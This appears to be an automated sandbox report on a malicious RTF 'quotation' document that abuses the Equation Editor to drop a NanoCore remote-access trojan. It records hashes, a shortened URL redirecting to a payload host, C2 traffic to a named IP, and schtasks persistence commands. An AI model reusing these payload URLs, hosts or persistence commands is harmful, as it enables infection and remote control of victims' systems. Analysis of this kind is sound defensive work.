                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\Public\69577.exe
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:modified
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:Rich Text Format data, unknown version
                                                                                Entropy (8bit):6.068615237294724
                                                                                TrID:
                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                File name:QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
                                                                                File size:967360
                                                                                MD5:bc1c94e783483f1c218efb5dcaf5f67e
                                                                                SHA1:7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
                                                                                SHA256:d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
                                                                                SHA512:e399eeecd3067441e52ddcbb394a8547e1ed20fb262a8c70ffc37ac49b6854410011e23d1405c94d6aded1ca32627b8a1f27bf35c7d2d1767dfffbbf3f3a7f17
                                                                                SSDEEP:24576:X6767676767676767676767676767676767676767676767676q5j:quuuuuuuuuuuuuuuuuuuuuuuus
                                                                                File Content Preview:{\rtf33843\page51787859448176035@m42JEUa4SrclZjjE@-KI2WTYrCCIYwauZ0C<eh&&7_M-C_D--_-V,64>88964$Cv>yt=n6|:%_>jn8%bm\mklP;=u\k6588.14.... .... ...... .... .... ....

                                                                                File Icon

                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                Static RTF Info

                                                                                Objects

                                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                0000D9BB0hno

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                02/25/21-07:31:12.865275TCP2025019ET TROJAN Possible NanoCore C2 60B491714488192.168.2.22194.5.98.202
                                                                                02/25/21-07:31:18.959312TCP2025019ET TROJAN Possible NanoCore C2 60B491724488192.168.2.22194.5.98.202
                                                                                02/25/21-07:31:26.516121TCP2025019ET TROJAN Possible NanoCore C2 60B491734488192.168.2.22194.5.98.202
                                                                                02/25/21-07:31:32.853198TCP2025019ET TROJAN Possible NanoCore C2 60B491744488192.168.2.22194.5.98.202
                                                                                02/25/21-07:31:39.738064TCP2025019ET TROJAN Possible NanoCore C2 60B491754488192.168.2.22194.5.98.202

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 25, 2021 07:29:14.575544119 CET4916580192.168.2.2267.199.248.10
                                                                                Feb 25, 2021 07:29:14.626983881 CET804916567.199.248.10192.168.2.22
                                                                                Feb 25, 2021 07:29:14.627127886 CET4916580192.168.2.2267.199.248.10
                                                                                Feb 25, 2021 07:29:14.627883911 CET4916580192.168.2.2267.199.248.10
                                                                                Feb 25, 2021 07:29:14.679239988 CET804916567.199.248.10192.168.2.22
                                                                                Feb 25, 2021 07:29:14.770637989 CET804916567.199.248.10192.168.2.22
                                                                                Feb 25, 2021 07:29:14.770742893 CET4916580192.168.2.2267.199.248.10
                                                                                Feb 25, 2021 07:29:14.934967041 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:14.986754894 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:14.987035036 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:15.002682924 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:15.057116032 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:15.057153940 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:15.057266951 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:15.057316065 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:15.069318056 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:15.124504089 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:15.124650002 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:16.673723936 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:16.754147053 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999515057 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999567032 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999798059 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:16.999907970 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999948025 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999984980 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:16.999989986 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.000025034 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.000046015 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.000701904 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000741959 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000777006 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.000799894 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.000830889 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.001118898 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001157999 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001193047 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.001195908 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001216888 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.001255989 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.001569986 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001612902 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.001647949 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.001668930 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.008138895 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.051927090 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.051981926 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052119017 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052165985 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052170992 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052200079 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052217007 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052244902 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052256107 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052284956 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052297115 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052316904 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052345037 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052361012 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052386045 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052406073 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052426100 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052454948 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052464962 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052479029 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052512884 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052530050 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052557945 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052572966 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052617073 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052823067 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052864075 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052885056 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052902937 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052908897 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052941084 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052961111 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.052979946 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.052989960 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053019047 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053040981 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053081036 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053147078 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053188086 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053210974 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053231955 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053481102 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053522110 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.053548098 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.053575039 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.055668116 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104232073 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104295969 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104334116 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104377031 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104413986 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104461908 CET443491665.79.72.163192.168.2.22
                                                                                Feb 25, 2021 07:29:17.104470968 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104502916 CET49166443192.168.2.225.79.72.163
                                                                                Feb 25, 2021 07:29:17.104506016 CET443491665.79.72.163192.168.2.22

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Feb 25, 2021 07:29:14.461078882 CET5219753192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:14.511269093 CET53521978.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:14.511475086 CET5219753192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:14.561319113 CET53521978.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:14.812344074 CET5309953192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:14.872477055 CET53530998.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:14.872773886 CET5309953192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:14.932527065 CET53530998.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:15.402287006 CET5283853192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:15.451178074 CET53528388.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:15.456893921 CET6120053192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:15.514120102 CET53612008.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:16.026027918 CET4954853192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:16.087656021 CET53495488.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:29:16.093247890 CET5562753192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:29:16.154942989 CET53556278.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:31:07.850161076 CET5600953192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:31:07.904503107 CET53560098.8.8.8192.168.2.22
                                                                                Feb 25, 2021 07:31:08.949430943 CET6186553192.168.2.228.8.8.8
                                                                                Feb 25, 2021 07:31:09.023087978 CET53618658.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Feb 25, 2021 07:29:14.461078882 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.511475086 CET192.168.2.228.8.8.80x7e45Standard query (0)bit.lyA (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.812344074 CET192.168.2.228.8.8.80xef41Standard query (0)u.teknik.ioA (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.872773886 CET192.168.2.228.8.8.80xef41Standard query (0)u.teknik.ioA (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:31:07.850161076 CET192.168.2.228.8.8.80xbe16Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:31:08.949430943 CET192.168.2.228.8.8.80xbf16Standard query (0)ibkebw.dm.files.1drv.comA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Feb 25, 2021 07:29:14.511269093 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.511269093 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.561319113 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.561319113 CET8.8.8.8192.168.2.220x7e45No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.872477055 CET8.8.8.8192.168.2.220xef41No error (0)u.teknik.ioteknik.ioCNAME (Canonical name)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.872477055 CET8.8.8.8192.168.2.220xef41No error (0)teknik.io5.79.72.163A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.932527065 CET8.8.8.8192.168.2.220xef41No error (0)u.teknik.ioteknik.ioCNAME (Canonical name)IN (0x0001)
                                                                                Feb 25, 2021 07:29:14.932527065 CET8.8.8.8192.168.2.220xef41No error (0)teknik.io5.79.72.163A (IP address)IN (0x0001)
                                                                                Feb 25, 2021 07:31:07.904503107 CET8.8.8.8192.168.2.220xbe16No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                Feb 25, 2021 07:31:09.023087978 CET8.8.8.8192.168.2.220xbf16No error (0)ibkebw.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                                                                Feb 25, 2021 07:31:09.023087978 CET8.8.8.8192.168.2.220xbf16No error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • bit.ly

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.224916567.199.248.1080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Feb 25, 2021 07:29:14.627883911 CET0OUTGET /2ZKf4aq HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: bit.ly
                                                                                Connection: Keep-Alive
                                                                                Feb 25, 2021 07:29:14.770637989 CET1INHTTP/1.1 301 Moved Permanently
                                                                                Server: nginx
                                                                                Date: Thu, 25 Feb 2021 06:29:14 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 116
                                                                                Cache-Control: private, max-age=90
                                                                                Location: https://u.teknik.io/wREzo.txt
                                                                                Set-Cookie: _bit=l1p6te-b37a8979adaf075f5e-00T; Domain=bit.ly; Expires=Tue, 24 Aug 2021 06:29:14 GMT
                                                                                Via: 1.1 google
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 77 52 45 7a 6f 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body></html>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: WINWORD.EXE PID: 2200 Parent PID: 584

                                                                                General

                                                                                Start time:07:28:30
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                Imagebase:0x13f320000
                                                                                File size:1424032 bytes
                                                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: EQNEDT32.EXE PID: 2308 Parent PID: 584

                                                                                General

                                                                                Start time:07:28:32
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: 69577.exe PID: 2680 Parent PID: 2308

                                                                                General

                                                                                Start time:07:28:35
                                                                                Start date:25/02/2021
                                                                                Path:C:\Users\Public\69577.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\Public\69577.exe
                                                                                Imagebase:0x400000
                                                                                File size:131072 bytes
                                                                                MD5 hash:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Visual Basic
                                                                                Antivirus matches:
                                                                                • Detection: 28%, ReversingLabs
                                                                                Reputation:low

                                                                                Analysis Process: RegAsm.exe PID: 2916 Parent PID: 2680

                                                                                General

                                                                                Start time:07:30:17
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\Public\69577.exe
                                                                                Imagebase:0xbf0000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Analysis Process: RegAsm.exe PID: 2488 Parent PID: 2680

                                                                                General

                                                                                Start time:07:30:22
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\Public\69577.exe
                                                                                Imagebase:0xbf0000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:moderate

                                                                                Analysis Process: schtasks.exe PID: 3060 Parent PID: 2488

                                                                                General

                                                                                Start time:07:30:28
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
                                                                                Imagebase:0x2c0000
                                                                                File size:179712 bytes
                                                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: schtasks.exe PID: 2276 Parent PID: 2488

                                                                                General

                                                                                Start time:07:30:29
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
                                                                                Imagebase:0x2c0000
                                                                                File size:179712 bytes
                                                                                MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: taskeng.exe PID: 2272 Parent PID: 860

                                                                                General

                                                                                Start time:07:30:29
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\System32\taskeng.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                Imagebase:0xff9c0000
                                                                                File size:464384 bytes
                                                                                MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Analysis Process: RegAsm.exe PID: 1904 Parent PID: 2272

                                                                                General

                                                                                Start time:07:30:30
                                                                                Start date:25/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
                                                                                Imagebase:0xbf0000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate

                                                                                Analysis Process: smtpsvc.exe PID: 2348 Parent PID: 2272

                                                                                General

                                                                                Start time:07:30:31
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
                                                                                Imagebase:0xd90000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Antivirus matches:
                                                                                • Detection: 0%, Virustotal, Browse
                                                                                • Detection: 0%, Metadefender, Browse
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:moderate

                                                                                Analysis Process: filename1.exe PID: 1552 Parent PID: 1388

                                                                                General

                                                                                Start time:07:30:36
                                                                                Start date:25/02/2021
                                                                                Path:C:\Users\user\subfolder1\filename1.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\subfolder1\filename1.exe'
                                                                                Imagebase:0x400000
                                                                                File size:131072 bytes
                                                                                MD5 hash:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:Visual Basic
                                                                                Antivirus matches:
                                                                                • Detection: 28%, ReversingLabs
                                                                                Reputation:low

                                                                                Analysis Process: smtpsvc.exe PID: 2560 Parent PID: 1388

                                                                                General

                                                                                Start time:07:30:45
                                                                                Start date:25/02/2021
                                                                                Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                                                                                Imagebase:0x1240000
                                                                                File size:53248 bytes
                                                                                MD5 hash:246BB0F8D68A463FD17C235DEB5491C0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Reputation:moderate

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >